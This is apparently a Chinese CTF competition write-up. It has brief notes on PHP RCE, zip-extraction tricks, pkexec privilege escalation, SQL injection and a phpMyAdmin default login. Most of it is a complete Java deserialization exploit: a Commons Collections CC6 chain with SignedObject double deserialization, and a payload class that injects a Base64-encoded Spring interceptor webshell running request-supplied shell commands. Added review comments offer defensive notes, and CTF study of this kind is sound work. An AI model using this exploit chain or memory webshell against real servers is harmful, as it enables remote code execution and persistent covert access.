Web
简单的PHP
PHP7 取反+无参RCE,把命令放在请求头里,然后取请求头的命令执行即可:
can_u_login
原题:https://www.cnblogs.com/zhengna/p/15917521.html
简单包含
脏数据绕过
压缩包
# Builds pwn.zip in two passes. Per the surrounding notes, the archive is meant to make
# the server-side extraction raise an error part-way through.
# -y stores symbolic links as links instead of following them.
zip -y pwn.zip passwd.php
# The same name is now used for a directory, so the archive presumably ends up with a
# file entry and a directory-style entry for passwd.php (TODO confirm against the archive listing).
mkdir passwd.php
zip -y pwn.zip passwd.php/.jpg
# NOTE(review): defensive takeaway, assuming the notes describe the target correctly:
# the cleanup of extracted files should run on every exit path (including extraction errors),
# and entry names should be validated before anything is written to disk.
构造一个特殊的压缩包,让它在解压时报错,这样就不会进入删除文件的if分支。
高手高手高高手
diff源码发现这边双引号变单引号
1day改下
拿session
写文件
web有个二进制。ida
大致意思就是bocai.html没了就行
pkexec提权
有ia特殊属性。去掉之后rm -rf文件
然后执行下elf
Ez_Java
两个姿势。一个直接用依赖中自带的org.apache.xalan.xsltc.trax.TemplatesImpl绕过原生TemplatesImpl。直接打
第二个用二次反序列化绕过。黑名单过滤cc3.2的TiedMapEntry。用CC4.4的TiedMapEntry代替。
随便一个加载字节码的类
然后用CC6
123会当作参数传入transform
把123换成SignedObject对象,它就会作为参数传入InvokerTransformer的transform方法
然后input可控。修改this的属性。调用到SignedObject的getObject
进行二次反序列化。加载字节码
EXP:
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import javassist.ClassPool;
import javassist.NotFoundException;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections4.keyvalue.TiedMapEntry;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.security.*;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;
/**
 * CTF proof-of-concept from the write-up: builds two nested HashSet object graphs out of
 * Commons Collections classes, wraps the inner graph in a {@link SignedObject}, serializes the
 * outer graph to {@code ./cc6} and reads it back in the same JVM.
 *
 * <p>Reviewer notes for defenders:
 * <ul>
 *   <li>The entry class used here is {@code org.apache.commons.collections4.keyvalue.TiedMapEntry};
 *       according to the write-up the target only deny-listed the Commons Collections 3.2 class of
 *       the same name. A deny-list keyed on class names misses equivalent classes from other
 *       packages; an allow-list {@code ObjectInputFilter} (JEP 290) is the robust control.</li>
 *   <li>{@code SignedObject.getObject()} deserializes its content with its own
 *       {@code ObjectInputStream}, so checks implemented by overriding {@code resolveClass} on the
 *       outer stream do not see the inner classes. A process-wide serial filter
 *       ({@code jdk.serialFilter}) applies to that nested stream as well.</li>
 * </ul>
 */
public class cc6 {
/**
 * Sets a field by reflection, ignoring access modifiers.
 *
 * @param obj   object whose field is written
 * @param field name of a field declared directly on {@code obj}'s class
 *              ({@code getDeclaredField} does not search superclasses)
 * @param value value to store
 * @throws Exception if the field does not exist or cannot be written
 */
public static void setField(Object obj, String field, Object value) throws Exception {
Field f = obj.getClass().getDeclaredField(field);
f.setAccessible(true);
f.set(obj, value);
}
/**
 * Builds the object graph, writes it to {@code ./cc6} and immediately deserializes it again.
 *
 * @param args unused
 * @throws Exception on any reflection, crypto or class-lookup failure outside the final try block
 */
public static void main(String[] args) throws Exception {
// Raw class-file bytes of the companion class `exp`, read through javassist.
byte[] bytes = ClassPool.getDefault().get(exp.class.getName()).toBytecode();
byte[][] bytecode = new byte[][]{bytes};
HashMap innermap = new HashMap();
// TemplatesImpl with its private state filled in reflectively: _bytecodes carries the class
// bytes, _name is a non-null placeholder, _class is cleared.
TemplatesImpl templates = TemplatesImpl.class.newInstance();
setField(templates, "_bytecodes", bytecode);
setField(templates, "_name", "test");
setField(templates, "_class", null);
// LazyMap whose factory instantiates TrAXFilter(Templates) for a missing key. Constructing
// TrAXFilter from a Templates object is the step that defines and initializes the classes held
// in _bytecodes (known JDK behaviour, not visible in this file).
LazyMap map = (LazyMap) LazyMap.decorate(innermap, new FactoryTransformer(new InstantiateFactory(TrAXFilter.class, new Class[]{Templates.class}, new Object[]{templates})));
TiedMapEntry tiedmap = new TiedMapEntry(map, 123);
// A HashSet is created with a harmless placeholder element, then the key of its backing
// HashMap node is swapped for the entry by reflection instead of calling add().
// NOTE(review): presumably done so the entry is not hashed while the graph is being built.
HashSet hashset = new HashSet(1);
hashset.add("foo");
Field field = Class.forName("java.util.HashSet").getDeclaredField("map");
field.setAccessible(true);
HashMap hashset_map = (HashMap) field.get(hashset);
Field table = Class.forName("java.util.HashMap").getDeclaredField("table");
table.setAccessible(true);
Object[] array = (Object[]) table.get(hashset_map);
// Assumes the single node sits in bucket 0 or bucket 1; no other index is checked.
Object node = array[0];
if (node == null) {
node = array[1];
}
Field key = node.getClass().getDeclaredField("key");
key.setAccessible(true);
key.set(node, tiedmap);
// A throw-away DSA key pair is generated only so that a SignedObject can be constructed;
// nothing in this file ever verifies the signature.
KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA");
keyPairGenerator.initialize(1024);
KeyPair keyPair = keyPairGenerator.genKeyPair();
PrivateKey privateKey = keyPair.getPrivate();
Signature signature = Signature.getInstance(privateKey.getAlgorithm());
// The first HashSet is serialized into the SignedObject's internal byte content here.
SignedObject signedObject = new SignedObject((Serializable)hashset, privateKey, signature);
// Transformer that calls the no-argument method getObject() on whatever object it receives.
InvokerTransformer i = new InvokerTransformer("getObject", null, null);
HashMap innermap1 = new HashMap();
LazyMap map2 = (LazyMap) LazyMap.decorate(innermap1, i);
// Same entry/HashSet construction as above, this time with the SignedObject as the entry key.
TiedMapEntry tiedmap2 = new TiedMapEntry(map2, signedObject);
HashSet hashset2 = new HashSet(1);
hashset2.add("foo");
Field field2 = Class.forName("java.util.HashSet").getDeclaredField("map");
field2.setAccessible(true);
HashMap hashset_map2 = (HashMap) field2.get(hashset2);
Field table2 = Class.forName("java.util.HashMap").getDeclaredField("table");
table2.setAccessible(true);
Object[] array2 = (Object[]) table2.get(hashset_map2);
Object node2 = array2[0];
if (node2 == null) {
node2 = array2[1];
}
// NOTE(review): key2 is looked up but never used; the next two lines reuse `key` from the
// first graph.
Field key2 = node2.getClass().getDeclaredField("key");
key.setAccessible(true);
key.set(node2, tiedmap2);
try {
// Writes the outer HashSet to ./cc6 and reads it straight back, so the deserialization
// happens in this same JVM. The streams are not in try-with-resources and the input
// stream is never closed.
ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./cc6"));
outputStream.writeObject(hashset2);
outputStream.close();
ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("./cc6"));
inputStream.readObject();
} catch (Exception e) {
e.printStackTrace();
}
}
}
exp.java
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.springframework.util.Base64Utils;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.servlet.handler.AbstractHandlerMapping;
import java.io.IOException;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.ArrayList;
/**
 * Translet subclass from the write-up whose static initializer calls {@link #printName()} as soon
 * as the class is initialized.
 *
 * <p>What the visible code does: starts a {@code whoami} process, defines a class named
 * {@code GuokeController} from an embedded Base64 blob through a reflective call to
 * {@code ClassLoader.defineClass}, and appends an instance of it to the
 * {@code adaptedInterceptors} list of Spring's {@code requestMappingHandlerMapping} bean.
 *
 * <p>Reviewer notes for defenders:
 * <ul>
 *   <li>Detection: an interceptor that appears in {@code adaptedInterceptors} at runtime and whose
 *       class has no backing file in the deployed artifact; child processes spawned by the
 *       application server's JVM.</li>
 *   <li>Hardening: on JDKs with strong encapsulation, the {@code setAccessible(true)} call on
 *       {@code ClassLoader.defineClass} fails unless {@code java.lang} has been opened with
 *       {@code --add-opens}; avoid adding such flags to production launch scripts without need.</li>
 * </ul>
 */
public class exp extends AbstractTranslet {
// Runs printName() once at class initialization; every declared failure type is caught and
// only printed, so initialization itself does not fail on these exceptions.
static {
try {
printName();
} catch (NoSuchFieldException e) {
e.printStackTrace();
} catch (ClassNotFoundException e) {
e.printStackTrace();
} catch (InvocationTargetException e) {
e.printStackTrace();
} catch (NoSuchMethodException e) {
e.printStackTrace();
} catch (IllegalAccessException e) {
e.printStackTrace();
} catch (InstantiationException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
}
/**
 * Starts a process, defines the embedded class and registers an instance of it as a Spring
 * handler interceptor.
 *
 * @throws NoSuchMethodException     if {@code defineClass} cannot be found
 * @throws InvocationTargetException if the reflective {@code defineClass} call throws
 * @throws IllegalAccessException    if a reflective access is refused
 * @throws NoSuchFieldException      if {@code adaptedInterceptors} is not declared on
 *                                   {@code AbstractHandlerMapping}
 * @throws ClassNotFoundException    if the defined class cannot be loaded by name
 * @throws InstantiationException    if the defined class cannot be instantiated
 * @throws IOException               if the process cannot be started
 */
public static void printName() throws NoSuchMethodException, InvocationTargetException, IllegalAccessException, NoSuchFieldException, ClassNotFoundException, InstantiationException, IOException {
// The process output is never read; the call only starts the process.
Runtime.getRuntime().exec("whoami");
String className = "GuokeController";
// The blob starts with "yv66vg", the Base64 form of the 0xCAFEBABE class-file magic.
// NOTE(review): its constant-pool strings suggest a HandlerInterceptorAdapter subclass whose
// preHandle reads a request parameter and hands it to ProcessBuilder (cmd.exe /c or /bin/sh -c)
// and writes the output to the response — confirm by decompiling in an isolated environment.
// NOTE(review): the literal is split across two lines in this listing.
byte[] bytes = Base64Utils.decodeFromString("yv66vgAAADQAiAoAIABGCABHCwBIAEkLAEoASwgATAgATQoATgBPCgAMAFAIAFEKAAwAUgcAUwcAVAgAVQgAVgoACwBXCABYCABZBwBaCgALAFsKAFwAXQoAEgBeCABfCgASAGAKABIAYQoAEgBiCgASAGMKAGQAZQoAZABmCgBkAGMHAGcHAGgHAGkBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEUxHdW9rZUNvbnRyb2xsZXI7AQAJcHJlSGFuZGxlAQBkKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTtMamF2YS9sYW5nL09iamVjdDspWgEAAXABABpMamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyOwEABndyaXRlcgEAFUxqYXZhL2lvL1ByaW50V3JpdGVyOwEAAW8BABJMamF2YS9sYW5nL1N0cmluZzsBAAFjAQATTGphdmEvdXRpbC9TY2FubmVyOwEAB3JlcXVlc3QBACdMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAAhyZXNwb25zZQEAKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTsBAAdoYW5kbGVyAQASTGphdmEvbGFuZy9PYmplY3Q7AQAEY29kZQEADVN0YWNrTWFwVGFibGUHAFQHAGoHAFMHAFoHAGgHAGsHAGwHAG0HAGcBAApFeGNlcHRpb25zAQAKU291cmNlRmlsZQEAFEd1b2tlQ29udHJvbGxlci5qYXZhDAAhACIBAApndW9rZTEyMTM4BwBrDABuAG8HAGwMAHAAcQEAAAEAB29zLm5hbWUHAHIMAHMAbwwAdAB1AQADd2luDAB2AHcBABhqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXIBABBqYXZhL2xhbmcvU3RyaW5nAQAHY21kLmV4ZQEAAi9jDAAhAHgBAAcvYmluL3NoAQACLWMBABFqYXZhL3V0aWwvU2Nhbm5lcgwAeQB6BwB7DAB8AH0MACEAfgEAAlxBDAB/AIAMAIEAggwAgwB1DACEACIHAGoMAIUAhgwAhwAiAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAD0d1b2tlQ29udHJvbGxlcgEAQW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvaGFuZGxlci9IYW5kbGVySW50ZXJjZXB0b3JBZGFwdGVyAQATamF2YS9pby9QcmludFdyaXRlcgEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEAEGphdmEvbGFuZy9PYmplY3QBAAxnZXRQYXJhbWV0ZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQALdG9Mb3dlckNhc2UBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8
vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAHaGFzTmV4dAEAAygpWgEABG5leHQBAAVjbG9zZQEABXdyaXRlAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAFZmx1c2gAIQAfACAAAAAAAAIAAQAhACIAAQAjAAAALwABAAEAAAAFKrcAAbEAAAACACQAAAAGAAEAAAAFACUAAAAMAAEAAAAFACYAJwAAAAEAKAApAAIAIwAAAboABgAJAAAArysSArkAAwIAOgQZBMYAoSy5AAQBADoFEgU6BhIGuAAHtgAIEgm2AAqZACK7AAtZBr0ADFkDEg1TWQQSDlNZBRkEU7cADzoHpwAfuwALWQa9AAxZAxIQU1kEEhFTWQUZBFO3AA86B7sAElkZB7YAE7YAFLcAFRIWtgAXOggZCLYAGJkACxkItgAZpwAFGQY6BhkItgAaGQUZBrYAGxkFtgAcGQW2AB2nAAU6BQOsBKwAAQAPAKYAqQAeAAMAJAAAAEYAEQAAAAcACgAIAA8ACgAXAAsAGwANACsADgBKABAAZgASAHwAEwCQABQAlQAVAJwAFgChABcApgAZAKkAGACrABoArQAcACUAAABmAAoARwADACoAKwAHABcAjwAsAC0ABQAbAIsALgAvAAYAZgBAACoAKwAHAHwAKgAwADEACAAAAK8AJgAnAAAAAACvADIAMwABAAAArwA0ADUAAgAAAK8ANgA3AAMACgClADgALwAEADkAAAA5AAf+AEoHADoHADsHADr8ABsHADz8ACUHAD1BBwA6/wAaAAUHAD4HAD8HAEAHAEEHADoAAQcAQgEBAEMAAAAEAAEAHgABAEQAAAACAEU");
// bytecode of the controller class
// Loader of the current thread's class, then a reflective call to the protected
// ClassLoader.defineClass(String, byte[], int, int) to define the decoded bytes under className.
ClassLoader classLoader = Thread.currentThread().getClass().getClassLoader();
Method method = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
method.setAccessible(true);
method.invoke(classLoader, className, bytes, 0, bytes.length);
// The web application context is read from the current request's attributes (scope 0).
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
AbstractHandlerMapping abstractHandlerMapping = (AbstractHandlerMapping) context.getBean("requestMappingHandlerMapping");
// The private adaptedInterceptors list is read by reflection and a new instance of the
// defined class is appended to it; nothing is written to disk by this method.
Field field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
field.setAccessible(true);
ArrayList<Object> adaptedInterceptors = (ArrayList<Object>) field.get(abstractHandlerMapping);
adaptedInterceptors.add(classLoader.loadClass(className).newInstance());
}
// Empty override; no transformation work is done (presumably present only to satisfy the
// abstract superclass).
@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
// Empty override; no transformation work is done (presumably present only to satisfy the
// abstract superclass).
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
}
easygo
go.mod有github项目地址:https://github.com/KaanSK/golang-sqli-challenge/blob/main/main.go
没有过滤的postgresql注入。
sqlmap跑:
easy_sql
phpmyadmin
root@password登录
直接看flag